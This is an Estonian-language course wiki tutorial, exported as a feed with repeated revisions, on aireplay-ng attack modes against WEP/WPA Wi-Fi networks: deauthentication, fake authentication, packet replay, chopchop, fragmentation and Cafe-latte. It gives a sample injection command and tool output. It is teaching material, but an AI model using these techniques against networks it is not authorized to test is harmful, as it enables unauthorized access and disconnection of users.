* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
15:49:32  Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30986</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30986"/>
		<updated>2011-05-10T10:51:41Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Viited */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
